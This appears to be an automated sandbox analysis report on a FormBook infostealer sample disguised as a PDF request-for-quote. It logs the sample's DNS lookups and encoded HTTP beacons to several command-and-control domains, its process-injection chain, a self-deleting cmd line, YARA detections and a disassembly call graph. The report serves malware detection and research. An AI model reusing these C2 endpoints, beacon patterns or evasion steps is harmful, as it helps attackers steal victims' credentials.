                                                                                                              Jan 13, 2025 13:09:27.611670017 CET1.1.1.1192.168.2.60xc897No error (0)huayang.302.gn301.xyz23.225.71.166A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:09:27.611670017 CET1.1.1.1192.168.2.60xc897No error (0)huayang.302.gn301.xyz23.225.71.183A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:09:48.909723043 CET1.1.1.1192.168.2.60x948Name error (3)www.d66dr114gl.bondnonenoneA (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • www.simo1simo001.click
                                                                                                              • www.ilsgroup.net
                                                                                                              • www.7b5846.online
                                                                                                              • www.maheshg.xyz
                                                                                                              • www.gequiltdesins.shop

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.649738164.92.166.75804004C:\Windows\explorer.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 13, 2025 13:06:02.169464111 CET173OUTGET /hwu6/?CXFd8=VqwCA0fDirS9FNcK+XWY5HArCimG0sfrxcJclabbIM4+tzWzOeCWxbUPg8n3aCtVsQmTH2yodQ==&Ez=ltxdQ8m HTTP/1.1
                                                                                                              Host: www.simo1simo001.click
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.649751172.104.236.215804004C:\Windows\explorer.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 13, 2025 13:06:22.302968979 CET167OUTGET /hwu6/?CXFd8=mpYjKcP0TN+fbEitUHIdgmI2VRYct5ttq2KUkf3p2L9OArgqjWS4GwM5LnRr9sxMQhRrBRaxzw==&Ez=ltxdQ8m HTTP/1.1
                                                                                                              Host: www.ilsgroup.net
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.649752104.21.40.196804004C:\Windows\explorer.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 13, 2025 13:06:42.017618895 CET168OUTGET /hwu6/?CXFd8=YeF1y3E0QpZaaHwaKvJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd2HkwQuXQqI9c12LSg==&Ez=ltxdQ8m HTTP/1.1
                                                                                                              Host: www.7b5846.online
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jan 13, 2025 13:06:42.497585058 CET784INHTTP/1.1 301 Moved Permanently
                                                                                                              Date: Mon, 13 Jan 2025 12:06:42 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 167
                                                                                                              Connection: close
                                                                                                              Cache-Control: max-age=3600
                                                                                                              Expires: Mon, 13 Jan 2025 13:06:42 GMT
                                                                                                              Location: https://7b5846.live
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mtAKPSn4P5MkZLJ1J9dGJz1qLntX7hpBkuzr%2BHnl6GmcsOUbn4e4KdZ2xsTIbMgWvvzzfExPrHVEVShmkowcCfYpFwia81Qx37NIXT2F%2FDuAcEM7oMCZQ1MMILsoJxXO9WV%2Biw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90154303398c42ec-EWR
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.649753217.21.91.24804004C:\Windows\explorer.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 13, 2025 13:07:23.615294933 CET166OUTGET /hwu6/?CXFd8=FXfZ1xOYYW9swHejpVIfMDCztZ/FrnQZeJUgNQ4rzoTHCxvijkBbGX2//Z/tWIGDAo4gMXnXlg==&Ez=ltxdQ8m HTTP/1.1
                                                                                                              Host: www.maheshg.xyz
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.649755104.21.80.156804004C:\Windows\explorer.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 13, 2025 13:08:04.503456116 CET173OUTGET /hwu6/?CXFd8=+zwICv/sB1e6MtWwpRel8f5Q0bYKICZzsoJO8W/+cdiLpY7N+AEBhZIv3jjSTSPlRhhnl/FLAA==&Ez=ltxdQ8m HTTP/1.1
                                                                                                              Host: www.gequiltdesins.shop
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:07:05:22
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe"
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:1'790'464 bytes
                                                                                                              MD5 hash:F1CB41BE3365B899A74D919DF902FC08
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:2
                                                                                                              Start time:07:05:23
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe"
                                                                                                              Imagebase:0x980000
                                                                                                              File size:46'504 bytes
                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:07:05:24
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                              Imagebase:0x7ff609140000
                                                                                                              File size:5'141'208 bytes
                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.4776081741.0000000008811000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:07:05:27
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\SysWOW64\autoconv.exe"
                                                                                                              Imagebase:0x180000
                                                                                                              File size:842'752 bytes
                                                                                                              MD5 hash:A705C2ACED7DDB71AFB87C4ED384BED6
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:5
                                                                                                              Start time:07:05:27
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\help.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\SysWOW64\help.exe"
                                                                                                              Imagebase:0x870000
                                                                                                              File size:10'240 bytes
                                                                                                              MD5 hash:DD40774E56D4C44B81F2DFA059285E75
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:moderate
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:6
                                                                                                              Start time:07:05:30
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                                                                              Imagebase:0x1c0000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:07:05:30
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.7%
                                                                                                                Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                Signature Coverage:3.3%
                                                                                                                Total number of Nodes:1594
                                                                                                                Total number of Limit Nodes:49
                                                                                                                execution_graph 95901 a41044 95906 a410f3 95901->95906 95903 a4104a 95942 a600a3 29 API calls __onexit 95903->95942 95905 a41054 95943 a41398 95906->95943 95910 a4116a 95953 a4a961 95910->95953 95913 a4a961 22 API calls 95914 a4117e 95913->95914 95915 a4a961 22 API calls 95914->95915 95916 a41188 95915->95916 95917 a4a961 22 API calls 95916->95917 95918 a411c6 95917->95918 95919 a4a961 22 API calls 95918->95919 95920 a41292 95919->95920 95958 a4171c 95920->95958 95924 a412c4 95925 a4a961 22 API calls 95924->95925 95926 a412ce 95925->95926 95979 a51940 95926->95979 95928 a412f9 95989 a41aab 95928->95989 95930 a41315 95931 a41325 GetStdHandle 95930->95931 95932 a82485 95931->95932 95933 a4137a 95931->95933 95932->95933 95934 a8248e 95932->95934 95936 a41387 OleInitialize 95933->95936 95996 a5fddb 95934->95996 95936->95903 95937 a82495 96006 ab011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 95937->96006 95939 a8249e 96007 ab0944 CreateThread 95939->96007 95941 a824aa CloseHandle 95941->95933 95942->95905 96008 a413f1 95943->96008 95946 a413f1 22 API calls 95947 a413d0 95946->95947 95948 a4a961 22 API calls 95947->95948 95949 a413dc 95948->95949 96015 a46b57 95949->96015 95951 a41129 95952 a41bc3 6 API calls 95951->95952 95952->95910 95954 a5fe0b 22 API calls 95953->95954 95955 a4a976 95954->95955 95956 a5fddb 22 API calls 95955->95956 95957 a41174 95956->95957 95957->95913 95959 a4a961 22 API calls 95958->95959 95960 a4172c 95959->95960 95961 a4a961 22 API calls 95960->95961 95962 a41734 95961->95962 95963 a4a961 22 API calls 95962->95963 95964 a4174f 95963->95964 95965 a5fddb 22 API calls 95964->95965 95966 a4129c 95965->95966 95967 a41b4a 95966->95967 95968 a41b58 95967->95968 95969 a4a961 22 API calls 95968->95969 95970 a41b63 95969->95970 95971 a4a961 22 API calls 95970->95971 95972 a41b6e 95971->95972 95973 a4a961 22 API calls 95972->95973 95974 a41b79 95973->95974 95975 a4a961 22 API calls 95974->95975 95976 a41b84 95975->95976 95977 a5fddb 22 API calls 95976->95977 95978 a41b96 RegisterWindowMessageW 95977->95978 95978->95924 95980 a51981 95979->95980 95981 a5195d 95979->95981 96060 a60242 5 API calls __Init_thread_wait 95980->96060 95988 a5196e 95981->95988 96062 a60242 5 API calls __Init_thread_wait 95981->96062 95983 a5198b 95983->95981 96061 a601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95983->96061 95986 a58727 95986->95988 96063 a601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95986->96063 95988->95928 95990 a8272d 95989->95990 95991 a41abb 95989->95991 96064 ab3209 23 API calls 95990->96064 95992 a5fddb 22 API calls 95991->95992 95994 a41ac3 95992->95994 95994->95930 95995 a82738 95998 a5fde0 95996->95998 95997 a6ea0c ___std_exception_copy 21 API calls 95997->95998 95998->95997 95999 a5fdfa 95998->95999 96001 a5fdfc 95998->96001 96065 a64ead 7 API calls 2 library calls 95998->96065 95999->95937 96002 a6066d 96001->96002 96066 a632a4 RaiseException 96001->96066 96067 a632a4 RaiseException 96002->96067 96004 a6068a 96004->95937 96006->95939 96007->95941 96068 ab092a 28 API calls 96007->96068 96009 a4a961 22 API calls 96008->96009 96010 a413fc 96009->96010 96011 a4a961 22 API calls 96010->96011 96012 a41404 96011->96012 96013 a4a961 22 API calls 96012->96013 96014 a413c6 96013->96014 96014->95946 96016 a46b67 _wcslen 96015->96016 96017 a84ba1 96015->96017 96020 a46ba2 96016->96020 96021 a46b7d 96016->96021 96038 a493b2 96017->96038 96019 a84baa 96019->96019 96023 a5fddb 22 API calls 96020->96023 96027 a46f34 22 API calls 96021->96027 96024 a46bae 96023->96024 96028 a5fe0b 96024->96028 96026 a46b85 __fread_nolock 96026->95951 96027->96026 96030 a5fddb 96028->96030 96031 a5fdfa 96030->96031 96034 a5fdfc 96030->96034 96042 a6ea0c 96030->96042 96049 a64ead 7 API calls 2 library calls 96030->96049 96031->96026 96033 a6066d 96051 a632a4 RaiseException 96033->96051 96034->96033 96050 a632a4 RaiseException 96034->96050 96036 a6068a 96036->96026 96039 a493c9 __fread_nolock 96038->96039 96040 a493c0 96038->96040 96039->96019 96040->96039 96054 a4aec9 96040->96054 96047 a73820 FindHandlerForForeignException 96042->96047 96043 a7385e 96053 a6f2d9 20 API calls __dosmaperr 96043->96053 96045 a73849 RtlAllocateHeap 96046 a7385c 96045->96046 96045->96047 96046->96030 96047->96043 96047->96045 96052 a64ead 7 API calls 2 library calls 96047->96052 96049->96030 96050->96033 96051->96036 96052->96047 96053->96046 96055 a4aedc 96054->96055 96056 a4aed9 __fread_nolock 96054->96056 96057 a5fddb 22 API calls 96055->96057 96056->96039 96058 a4aee7 96057->96058 96059 a5fe0b 22 API calls 96058->96059 96059->96056 96060->95983 96061->95981 96062->95986 96063->95988 96064->95995 96065->95998 96066->96002 96067->96004 96069 a4dee5 96072 a4b710 96069->96072 96073 a4b72b 96072->96073 96074 a900f8 96073->96074 96075 a90146 96073->96075 96101 a4b750 96073->96101 96078 a90102 96074->96078 96081 a9010f 96074->96081 96074->96101 96138 ac58a2 207 API calls 2 library calls 96075->96138 96136 ac5d33 207 API calls 96078->96136 96098 a4ba20 96081->96098 96137 ac61d0 207 API calls 2 library calls 96081->96137 96084 a903d9 96084->96084 96085 a5d336 40 API calls 96085->96101 96088 a4ba4e 96090 a90322 96145 ac5c0c 82 API calls 96090->96145 96097 a4bbe0 40 API calls 96097->96101 96098->96088 96146 ab359c 82 API calls __wsopen_s 96098->96146 96101->96085 96101->96088 96101->96090 96101->96097 96101->96098 96103 a4ec40 96101->96103 96127 a4a81b 41 API calls 96101->96127 96128 a5d2f0 40 API calls 96101->96128 96129 a5a01b 207 API calls 96101->96129 96130 a60242 5 API calls __Init_thread_wait 96101->96130 96131 a5edcd 22 API calls 96101->96131 96132 a600a3 29 API calls __onexit 96101->96132 96133 a601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96101->96133 96134 a5ee53 82 API calls 96101->96134 96135 a5e5ca 207 API calls 96101->96135 96139 a4aceb 23 API calls messages 96101->96139 96140 a9f6bf 23 API calls 96101->96140 96141 a4a8c7 96101->96141 96104 a4ec76 messages 96103->96104 96105 a5fddb 22 API calls 96104->96105 96106 a4fef7 96104->96106 96109 a94600 96104->96109 96110 a94b0b 96104->96110 96111 a4a8c7 22 API calls 96104->96111 96117 a60242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96104->96117 96118 a4ed9d messages 96104->96118 96119 a4fbe3 96104->96119 96120 a4a961 22 API calls 96104->96120 96122 a600a3 29 API calls pre_c_initialization 96104->96122 96124 a94beb 96104->96124 96125 a601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96104->96125 96126 a4f3ae messages 96104->96126 96147 a501e0 207 API calls 2 library calls 96104->96147 96148 a506a0 41 API calls messages 96104->96148 96105->96104 96113 a4a8c7 22 API calls 96106->96113 96106->96118 96115 a4a8c7 22 API calls 96109->96115 96109->96118 96150 ab359c 82 API calls __wsopen_s 96110->96150 96111->96104 96113->96118 96115->96118 96117->96104 96118->96101 96119->96118 96121 a94bdc 96119->96121 96119->96126 96120->96104 96151 ab359c 82 API calls __wsopen_s 96121->96151 96122->96104 96152 ab359c 82 API calls __wsopen_s 96124->96152 96125->96104 96126->96118 96149 ab359c 82 API calls __wsopen_s 96126->96149 96127->96101 96128->96101 96129->96101 96130->96101 96131->96101 96132->96101 96133->96101 96134->96101 96135->96101 96136->96081 96137->96098 96138->96101 96139->96101 96140->96101 96142 a4a8ea __fread_nolock 96141->96142 96143 a4a8db 96141->96143 96142->96101 96143->96142 96144 a5fe0b 22 API calls 96143->96144 96144->96142 96145->96098 96146->96084 96147->96104 96148->96104 96149->96118 96150->96118 96151->96124 96152->96118 96153 a78402 96158 a781be 96153->96158 96156 a7842a 96163 a781ef try_get_first_available_module 96158->96163 96160 a783ee 96177 a727ec 26 API calls ___std_exception_copy 96160->96177 96162 a78343 96162->96156 96170 a80984 96162->96170 96163->96163 96166 a78338 96163->96166 96173 a68e0b 40 API calls 2 library calls 96163->96173 96165 a7838c 96165->96166 96174 a68e0b 40 API calls 2 library calls 96165->96174 96166->96162 96176 a6f2d9 20 API calls __dosmaperr 96166->96176 96168 a783ab 96168->96166 96175 a68e0b 40 API calls 2 library calls 96168->96175 96178 a80081 96170->96178 96172 a8099f 96172->96156 96173->96165 96174->96168 96175->96166 96176->96160 96177->96162 96179 a8008d ___DestructExceptionObject 96178->96179 96180 a8009b 96179->96180 96182 a800d4 96179->96182 96236 a6f2d9 20 API calls __dosmaperr 96180->96236 96189 a8065b 96182->96189 96183 a800a0 96237 a727ec 26 API calls ___std_exception_copy 96183->96237 96188 a800aa __wsopen_s 96188->96172 96239 a8042f 96189->96239 96192 a8068d 96271 a6f2c6 20 API calls __dosmaperr 96192->96271 96193 a806a6 96257 a75221 96193->96257 96196 a806ab 96197 a806cb 96196->96197 96198 a806b4 96196->96198 96270 a8039a CreateFileW 96197->96270 96273 a6f2c6 20 API calls __dosmaperr 96198->96273 96202 a806b9 96274 a6f2d9 20 API calls __dosmaperr 96202->96274 96203 a80781 GetFileType 96206 a8078c GetLastError 96203->96206 96207 a807d3 96203->96207 96205 a80756 GetLastError 96276 a6f2a3 20 API calls 2 library calls 96205->96276 96277 a6f2a3 20 API calls 2 library calls 96206->96277 96279 a7516a 21 API calls 3 library calls 96207->96279 96208 a80704 96208->96203 96208->96205 96275 a8039a CreateFileW 96208->96275 96212 a80692 96272 a6f2d9 20 API calls __dosmaperr 96212->96272 96213 a8079a CloseHandle 96213->96212 96214 a807c3 96213->96214 96278 a6f2d9 20 API calls __dosmaperr 96214->96278 96216 a80749 96216->96203 96216->96205 96218 a807f4 96220 a80840 96218->96220 96280 a805ab 72 API calls 4 library calls 96218->96280 96219 a807c8 96219->96212 96224 a8086d 96220->96224 96281 a8014d 72 API calls 4 library calls 96220->96281 96223 a80866 96223->96224 96225 a8087e 96223->96225 96282 a786ae 96224->96282 96227 a800f8 96225->96227 96228 a808fc CloseHandle 96225->96228 96238 a80121 LeaveCriticalSection __wsopen_s 96227->96238 96297 a8039a CreateFileW 96228->96297 96230 a80927 96231 a80931 GetLastError 96230->96231 96232 a8095d 96230->96232 96298 a6f2a3 20 API calls 2 library calls 96231->96298 96232->96227 96234 a8093d 96299 a75333 21 API calls 3 library calls 96234->96299 96236->96183 96237->96188 96238->96188 96240 a80450 96239->96240 96245 a8046a 96239->96245 96240->96245 96307 a6f2d9 20 API calls __dosmaperr 96240->96307 96243 a8045f 96308 a727ec 26 API calls ___std_exception_copy 96243->96308 96300 a803bf 96245->96300 96246 a804d1 96254 a80524 96246->96254 96311 a6d70d 26 API calls 2 library calls 96246->96311 96247 a804a2 96247->96246 96309 a6f2d9 20 API calls __dosmaperr 96247->96309 96250 a8051f 96252 a8059e 96250->96252 96250->96254 96251 a804c6 96310 a727ec 26 API calls ___std_exception_copy 96251->96310 96312 a727fc 11 API calls _abort 96252->96312 96254->96192 96254->96193 96256 a805aa 96258 a7522d ___DestructExceptionObject 96257->96258 96315 a72f5e EnterCriticalSection 96258->96315 96260 a7527b 96316 a7532a 96260->96316 96261 a75234 96261->96260 96262 a75259 96261->96262 96267 a752c7 EnterCriticalSection 96261->96267 96319 a75000 21 API calls 3 library calls 96262->96319 96265 a752a4 __wsopen_s 96265->96196 96266 a7525e 96266->96260 96320 a75147 EnterCriticalSection 96266->96320 96267->96260 96268 a752d4 LeaveCriticalSection 96267->96268 96268->96261 96270->96208 96271->96212 96272->96227 96273->96202 96274->96212 96275->96216 96276->96212 96277->96213 96278->96219 96279->96218 96280->96220 96281->96223 96322 a753c4 96282->96322 96284 a786c4 